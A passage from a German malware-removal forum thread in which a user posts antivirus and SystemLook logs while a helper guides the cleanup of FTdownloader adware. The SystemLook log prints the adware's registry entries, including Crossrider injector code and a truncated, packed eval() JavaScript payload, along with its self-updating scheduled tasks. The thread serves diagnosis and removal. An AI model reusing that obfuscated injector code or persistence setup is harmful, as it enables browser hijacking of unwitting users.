| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: SpyHunter4 als Pc-Scanner...Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
13.08.2013, 08:35
| #16 |
 |  SpyHunter4 als Pc-Scanner...Code:
ATTFilter ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=323582ef8fe5a842a20b36033251bb5e
# engine=14752
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2013-08-13 06:21:36
# local_time=2013-08-13 08:21:36 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=5122 16777213 100 90 2493439 125161092 0 0
# compatibility_mode=5893 16776573 100 94 3003334 128004746 0 0
# scanned=191261
# found=0
# cleaned=0
# scan_time=8465
|
|
13.08.2013, 08:47
| #17 |
| /// Winkelfunktion /// TB-Süch-Tiger™   | SpyHunter4 als Pc-Scanner... Ja. Das Log von Malwarebytes fehlt
__________________
__________________ |
|
13.08.2013, 09:10
| #18 |
| | SpyHunter4 als Pc-Scanner...Code:
ATTFilter Malwarebytes Anti-Malware (Test) 1.75.0.1300 www.malwarebytes.org Datenbank Version: v2013.08.12.07 Windows 7 Service Pack 1 x64 NTFS Internet Explorer 10.0.9200.16540 Moritz :: MORITZ-PC [Administrator] Schutz: Aktiviert 13.08.2013 10:06:40 mbam-log-2013-08-13 (10-06-40).txt Art des Suchlaufs: Quick-Scan Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM Deaktivierte Suchlaufeinstellungen: P2P Durchsuchte Objekte: 240837 Laufzeit: 3 Minute(n), 2 Sekunde(n) Infizierte Speicherprozesse: 0 (Keine bösartigen Objekte gefunden) Infizierte Speichermodule: 0 (Keine bösartigen Objekte gefunden) Infizierte Registrierungsschlüssel: 0 (Keine bösartigen Objekte gefunden) Infizierte Registrierungswerte: 0 (Keine bösartigen Objekte gefunden) Infizierte Dateiobjekte der Registrierung: 0 (Keine bösartigen Objekte gefunden) Infizierte Verzeichnisse: 0 (Keine bösartigen Objekte gefunden) Infizierte Dateien: 0 (Keine bösartigen Objekte gefunden) (Ende) |
|
13.08.2013, 09:14
| #19 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | SpyHunter4 als Pc-Scanner... Sieht soweit ok aus  Wegen Cookies und anderer Dinge im Web: Um die Pest von vornherein zu blocken (also TrackingCookies, Werbebanner etc.) müsstest du dir mal sowas wie MVPS Hosts File anschauen => Blocking Unwanted Parasites with a Hosts File - sinnvollerweise solltest du alle 4 Wochen mal bei MVPS nachsehen, ob er eine neue Hosts Datei herausgebracht hat. Info: Cookies sind keine Schädlinge direkt, aber es besteht die Gefahr der missbräuchlichen Verwendung (eindeutige Wiedererkennung zB für gezielte Werbung o.ä. => HTTP-Cookie ) Ansonsten gibt es noch gute Cookiemanager, Erweiterungen für den Firefox zB wäre da CookieCuller Wenn du aber damit leben kannst, dich bei jeder Browsersession überall neu einzuloggen (zB Facebook, Ebay, GMX, oder auch Trojaner-Board) dann stell den Browser einfach so ein, dass einfach alles beim Beenden des Browser inkl. Cookies gelöscht wird. Ist dein System nun wieder in Ordnung oder gibt's noch andere Funde oder Probleme?
__________________ Logfiles bitte immer in CODE-Tags posten  |
|
13.08.2013, 09:33
| #20 |
| | SpyHunter4 als Pc-Scanner... Nun ich habe unter C:\ Programme (x86) einen Ordner mit dem Namen: FTdownloader V4.0 gefunden. Wie bereits erwähnt hatte ich auch mal (oder immer noch) den ftdownloader auf meinem Computer. ich nehme mal, dass das das selbe ist wie vorher auch. Muss ich mir das jetzt Gedanken machen? Und wenn ja, wie bekomme ich das wieder weg. Einfach löschen? Und SpyHunter befindent sich immer noch auf dem Desktop. |
|
13.08.2013, 09:37
| #21 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | SpyHunter4 als Pc-Scanner... Scan mit SystemLook (x64) Lade SystemLook von jpshortstuff von einem der folgenden Spiegel herunter und speichere das Tool auf dem Desktop. SystemLook (64 bit)
__________________ --> SpyHunter4 als Pc-Scanner... |
|
13.08.2013, 09:42
| #22 |
| | SpyHunter4 als Pc-Scanner...Code:
ATTFilter SystemLook 30.07.11 by jpshortstuff
Log created at 10:39 on 13/08/2013 by Moritz
Administrator - Elevation successful
========== filefind ==========
Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll --a---- 393216 bytes [12:16 26/07/2013] [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe --a---- 338432 bytes [12:16 26/07/2013] [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll --a---- 473088 bytes [12:16 26/07/2013] [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe --a---- 442880 bytes [12:16 26/07/2013] [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-helper.exe --a---- 311808 bytes [12:16 26/07/2013] [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0.ico --a---- 9662 bytes [11:19 30/06/2013] [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk --a---- 726 bytes [07:36 13/08/2013] [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader --a---- 4256 bytes [12:16 26/07/2013] [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler --a---- 4166 bytes [12:16 26/07/2013] [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater --a---- 4262 bytes [12:16 26/07/2013] [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job --a---- 1226 bytes [12:16 26/07/2013] [07:27 13/08/2013] 3FB5E9A85AA0F499D86530241DACB64B
C:\Windows\Tasks\FTdownloader V4.0-enabler.job --a---- 1136 bytes [12:16 26/07/2013] [07:27 13/08/2013] FF2CF9A43027FE63CBF838105BF502B4
C:\Windows\Tasks\FTdownloader V4.0-updater.job --a---- 1232 bytes [12:16 26/07/2013] [07:27 13/08/2013] F62D368B093CC484B99E203338E25C37
Searching for "*Spyhunter*"
C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe --a---- 7529344 bytes [21:46 27/06/2013] [21:46 27/06/2013] 64F7854468F5D54389D9E0500FD47FE8
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_191644.log --a---- 64781 bytes [17:16 11/08/2013] [17:16 11/08/2013] 4AF03E4352D537823CA8F755E055A4C8
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_193743.log --a---- 124907 bytes [17:37 11/08/2013] [18:46 11/08/2013] 90D16F35B0521DE18E8EB3385E20C39A
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_204654.log --a---- 69511 bytes [18:46 11/08/2013] [18:49 11/08/2013] 43C73565F0B32BA34160D8B992742ABA
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_205012.log --a---- 69511 bytes [18:50 11/08/2013] [19:06 11/08/2013] 693434F81C3E8E626A174F255379A5E4
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130811_210735.log --a---- 122372 bytes [19:07 11/08/2013] [20:54 11/08/2013] 3F1C0E96D485B0059E71DC7536B93606
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_091522.log --a---- 123665 bytes [07:15 12/08/2013] [07:47 12/08/2013] 3EF394D1CF6424373116E4B5828D329B
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_094843.log --a---- 121749 bytes [07:48 12/08/2013] [08:29 12/08/2013] 6B4D540A516D2459989142FEB12D1C36
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_113256.log --a---- 124488 bytes [09:32 12/08/2013] [12:04 12/08/2013] D74F81776EBAB6EA51825AF9C450C271
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154235.log --a---- 64781 bytes [13:42 12/08/2013] [13:42 12/08/2013] 6EA9F0164892524F8EDDFCE854A429F4
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154539.log --a---- 64781 bytes [13:45 12/08/2013] [13:45 12/08/2013] C4F99D3D094BCE3CA34F437DBAED5E32
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154601.log --a---- 64781 bytes [13:46 12/08/2013] [13:46 12/08/2013] 37956886F3A17C6969B78E750AFFF8C7
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_154900.log --a---- 70451 bytes [13:49 12/08/2013] [14:12 12/08/2013] 40D07F2B569EEE3B5C216CE968F30B2D
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_161543.log --a---- 71659 bytes [14:15 12/08/2013] [15:09 12/08/2013] 38B208EFBC7B7C1FDE261AF114408962
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_171026.log --a---- 64468 bytes [15:10 12/08/2013] [15:10 12/08/2013] A3E3269035435A4E024B338BC02E0CF3
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_181932.log --a---- 69690 bytes [16:19 12/08/2013] [16:41 12/08/2013] 69F7C219CC65205A2FEAB591DFA3CB1B
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130812_213506.log --a---- 70848 bytes [19:35 12/08/2013] [21:09 12/08/2013] 84C23063CDD28F4446302A186FD0EBB6
C:\Program Files\Enigma Software Group\SpyHunter\Log\SpyHunter4_20130813_092707.log --a---- 69556 bytes [07:27 13/08/2013] [07:27 13/08/2013] 144FEF3F2843E12EC24BA4575E7385CF
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\SpyHunter.lnk --a---- 12130 bytes [13:26 12/08/2013] [13:26 12/08/2013] 7FB1162DAB9E2DA90C88CCECD0C87808
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\SpyHunter Emergency Startup.lnk --a---- 1912 bytes [08:42 27/07/2013] [08:42 27/07/2013] 016E6144CB2740A114B29DF603AA053B
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\SpyHunter.lnk --a---- 2254 bytes [08:42 27/07/2013] [08:42 27/07/2013] CC9E6FC3C818F1BD8DEDA8EFCFCBF153
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\Uninstall SpyHunter.lnk --a---- 996 bytes [08:42 27/07/2013] [08:42 27/07/2013] 73D176BF77F99B33447A07B40601A0E8
C:\Users\Moritz\Desktop\SpyHunter.lnk --a---- 2218 bytes [08:42 27/07/2013] [08:42 27/07/2013] 63289515C1643D0B1535387F7E1FEDF1
C:\Users\Moritz\Downloads\SpyHunter-Installer(1).exe --a---- 726464 bytes [08:31 27/07/2013] [08:31 27/07/2013] EEA0B34B60632083F2A75352BAE365FB
C:\Users\Moritz\Downloads\SpyHunter-Installer.exe --a---- 726464 bytes [08:25 27/07/2013] [08:25 27/07/2013] EEA0B34B60632083F2A75352BAE365FB
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf --a---- 165806 bytes [17:24 27/07/2013] [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8
C:\Windows\System32\Tasks\SpyHunter4Startup --a---- 3332 bytes [08:42 27/07/2013] [08:42 27/07/2013] 1E01CD65C6C6A6EA6EF2B7AE37BB57E7
========== folderfind ==========
Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0 d------ [12:15 26/07/2013]
C:\Users\Moritz\AppData\Local\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou d------ [12:15 26/07/2013]
Searching for "*Spyhunter*"
C:\Program Files\Enigma Software Group\SpyHunter d------ [08:42 27/07/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02 d----c- [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b d----c- [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1 d----c- [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981 d----c- [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0 d----c- [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35 d----c- [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7 d----c- [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e d----c- [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a d----c- [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876 d----c- [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652 d----c- [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6 d----c- [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450 d----c- [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02 d----c- [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b d----c- [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1 d----c- [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981 d----c- [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0 d----c- [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35 d----c- [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7 d----c- [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e d----c- [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a d----c- [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876 d----c- [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652 d----c- [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6 d----c- [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450 d----c- [17:54 07/08/2013]
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter d------ [08:42 27/07/2013]
========== regfind ==========
Searching for "FTdownloader"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="
/************************************************************************************
This is your background code.
For more information please visit our wiki site:
hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/
appAPI.ready(function($) {
var version="4.0";
try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
injectorBack.init("ftdown4", version, "htd");
});
"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==\\\"0\\\"){4S()}1O if(a.2V!=\\\"1\\\"||
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
@="FTDownloader URI"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
"Content Type"="application/x-FTDownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\DefaultIcon]
@="C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\shell\open\command]
@=""C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe" /u="%1""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\FTdownloader V4.0]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp]
"path"="C:\Program Files (x86)\FTDownloader.com\FTDownloader10.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="
/************************************************************************************
This is your background code.
For more information please visit our wiki site:
hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/
appAPI.ready(function($) {
var version="4.0";
try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
injectorBack.init("ftdown4", version, "htd");
});
"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"
Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter]
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig]
[HKEY_LOCAL_MACHINE\SOFTWARE\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig]
"InstallLoc"="C:\Program Files\Enigma Software Group\SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
